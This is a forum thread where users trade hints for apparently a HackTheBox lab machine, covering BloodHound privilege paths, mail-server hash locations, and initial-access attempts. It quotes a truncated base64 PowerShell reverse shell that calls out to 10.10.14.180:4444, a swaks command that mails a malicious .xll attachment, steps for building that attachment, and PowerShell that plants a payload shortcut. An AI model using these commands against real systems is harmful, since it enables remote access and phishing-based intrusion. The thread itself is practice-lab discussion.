Posts: 219
Threads: 14
Joined: Apr 2024
guys powershell3 base64 worked system("pow**ershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA4ADAAIgAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADs....................."); This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason:
Asking for rep is not allowed
Posts: 196
Threads: 31
Joined: Apr 2024
(Jun 23, 2024, 03:10 AM)standby123 Wrote: (Jun 23, 2024, 03:02 AM)saoBFo Wrote: (Jun 23, 2024, 02:20 AM)standby123 Wrote: (Jun 23, 2024, 02:01 AM)jeff1998 Wrote: Any hints for low user?
From bloodhound, this is the result.
Member of Web Devs has priv to reset App Devs member password. And App Devs member has PSRemote Priv to DC. So maybe from gideon.hamill we need to pwn users from Web Devs.
don't know what to do next. lol
Search in the folder C:\Program Files (x86)\hMailServer
I saw an email in there but I dismissed it, is that it or am I way off?
The hash in the hMailServer.INI is not crackable with rockyou
Hash what hash? search in C:\Program Files (x86)\hMailServer\Data
Posts: 6
Threads: 0
Joined: Sep 2023
Jun 23, 2024, 03:22 AM
(This post was last modified: Jun 23, 2024, 03:22 AM by saoBFo.)
(Jun 23, 2024, 03:10 AM)standby123 Wrote: (Jun 23, 2024, 03:02 AM)saoBFo Wrote: (Jun 23, 2024, 02:20 AM)standby123 Wrote: (Jun 23, 2024, 02:01 AM)jeff1998 Wrote: Any hints for low user?
From bloodhound, this is the result.
Member of Web Devs has priv to reset App Devs member password. And App Devs member has PSRemote Priv to DC. So maybe from gideon.hamill we need to pwn users from Web Devs.
don't know what to do next. lol
Search in the folder C:\Program Files (x86)\hMailServer
The hash in the hMailServer.INI is not crackable with rockyou
Hash what hash? search in C:\Program Files (x86)\hMailServer\Data
lnk in C:\inetpub\testing is not working, which type of "web shortcuts" is working for you?
Posts: 4
Threads: 0
Joined: Apr 2024
(Jun 23, 2024, 03:10 AM)standby123 Wrote: (Jun 23, 2024, 03:02 AM)saoBFo Wrote: (Jun 23, 2024, 02:20 AM)standby123 Wrote: (Jun 23, 2024, 02:01 AM)jeff1998 Wrote: Any hints for low user?
From bloodhound, this is the result.
Member of Web Devs has priv to reset App Devs member password. And App Devs member has PSRemote Priv to DC. So maybe from gideon.hamill we need to pwn users from Web Devs.
don't know what to do next. lol
Search in the folder C:\Program Files (x86)\hMailServer
The hash in the hMailServer.INI is not crackable with rockyou
Hash what hash? search in C:\Program Files (x86)\hMailServer\Data
Definitely put me on right trail with this post..out of the rabbit hole I went
Posts: 196
Threads: 31
Joined: Apr 2024
Jun 23, 2024, 03:38 AM
(This post was last modified: Jun 23, 2024, 03:39 AM by maggi.)
(Jun 23, 2024, 03:22 AM)saoBFo Wrote: (Jun 23, 2024, 03:10 AM)standby123 Wrote: (Jun 23, 2024, 03:02 AM)saoBFo Wrote: (Jun 23, 2024, 02:20 AM)standby123 Wrote: (Jun 23, 2024, 02:01 AM)jeff1998 Wrote: Any hints for low user?
From bloodhound, this is the result.
Member of Web Devs has priv to reset App Devs member password. And App Devs member has PSRemote Priv to DC. So maybe from gideon.hamill we need to pwn users from Web Devs.
don't know what to do next. lol
Search in the folder C:\Program Files (x86)\hMailServer
The hash in the hMailServer.INI is not crackable with rockyou
Hash what hash? search in C:\Program Files (x86)\hMailServer\Data
lnk in C:\inetpub\testing is not working, which type of "web shortcuts" is working for you?
I was just about to start dropping stuff in there, what did you use as your lnk file?
Posts: 4
Threads: 0
Joined: Apr 2024
(Jun 23, 2024, 03:16 AM)fuckhackthebox Wrote: (Jun 23, 2024, 03:13 AM)osamy7593 Wrote: guys powershell3 base64 worked system("pow**ershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA4ADAAIgAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADs.....................");
whats your swaks command look like?
same one thats in the the 2nd or 3rd page from this thread
Posts: 219
Threads: 14
Joined: Apr 2024
(Jun 23, 2024, 03:41 AM)fuckhackthebox Wrote: (Jun 23, 2024, 03:39 AM)markg34 Wrote: (Jun 23, 2024, 03:16 AM)fuckhackthebox Wrote: (Jun 23, 2024, 03:13 AM)osamy7593 Wrote: guys powershell3 base64 worked system("pow**ershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA4ADAAIgAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADs.....................");
whats your swaks command look like?
same one thats in the the 2nd or 3rd page from this thread
figured
seems to work for some but not others
done it 100 times now with no response
tried encoded ps like you suggested and still nothing
so weird Bro maybe u need to --server 10.10.11.21 --port 25 This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason:
Asking for rep is not allowed
Posts: 219
Threads: 14
Joined: Apr 2024
(Jun 23, 2024, 03:50 AM)fuckhackthebox Wrote: (Jun 23, 2024, 03:43 AM)osamy7593 Wrote: (Jun 23, 2024, 03:41 AM)fuckhackthebox Wrote: (Jun 23, 2024, 03:39 AM)markg34 Wrote: (Jun 23, 2024, 03:16 AM)fuckhackthebox Wrote: whats your swaks command look like?
same one thats in the the 2nd or 3rd page from this thread
figured
seems to work for some but not others
done it 100 times now with no response
tried encoded ps like you suggested and still nothing
so weird Bro maybe u need to --server 10.10.11.21 --port 25
pretty sure my swaks command is okay but appreciate the sanity check
swaks --to accounts@axlle.htb --from ihatethisbox@fuckhtb.htb --server 10.10.11.21 --port 25 --header "Subject: test" --body "test" --attach @test.xll
my vip ip for the box is different but ye
and that test.xll works locally
Maybe the internet issue close ur vm and try again if not download xllpoc and go to dllmain.cpp put the code after that xllpoc.sln open it in vs and build it the .dll will be created rename it to .xll after that send This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason:
Asking for rep is not allowed
Posts: 6
Threads: 0
Joined: Sep 2023
(Jun 23, 2024, 03:38 AM)maggi Wrote: (Jun 23, 2024, 03:22 AM)saoBFo Wrote: (Jun 23, 2024, 03:10 AM)standby123 Wrote: (Jun 23, 2024, 03:02 AM)saoBFo Wrote: (Jun 23, 2024, 02:20 AM)standby123 Wrote: Search in the folder C:\Program Files (x86)\hMailServer
The hash in the hMailServer.INI is not crackable with rockyou
Hash what hash? search in C:\Program Files (x86)\hMailServer\Data
lnk in C:\inetpub\testing is not working, which type of "web shortcuts" is working for you?
I was just about to start dropping stuff in there, what did you use as your lnk file?
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\inetpub\testing\test.lnk")
$lnk.TargetPath = "PATH to payload"
$lnk.Save()
But, this is not working..
Posts: 196
Threads: 31
Joined: Apr 2024
Jun 23, 2024, 04:01 AM
(This post was last modified: Jun 23, 2024, 04:04 AM by maggi.)
(Jun 23, 2024, 03:56 AM)saoBFo Wrote: (Jun 23, 2024, 03:38 AM)maggi Wrote: (Jun 23, 2024, 03:22 AM)saoBFo Wrote: (Jun 23, 2024, 03:10 AM)standby123 Wrote: (Jun 23, 2024, 03:02 AM)saoBFo Wrote: The hash in the hMailServer.INI is not crackable with rockyou
Hash what hash? search in C:\Program Files (x86)\hMailServer\Data
lnk in C:\inetpub\testing is not working, which type of "web shortcuts" is working for you?
I was just about to start dropping stuff in there, what did you use as your lnk file?
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\inetpub\testing\test.lnk")
$lnk.TargetPath = "PATH to payload"
$lnk.Save()
But, this is not working..
mist?
lol, I was just in the middle of trying to see if that might work
I was looking at some stuff to see how to make a URL shortcut in powershell
|
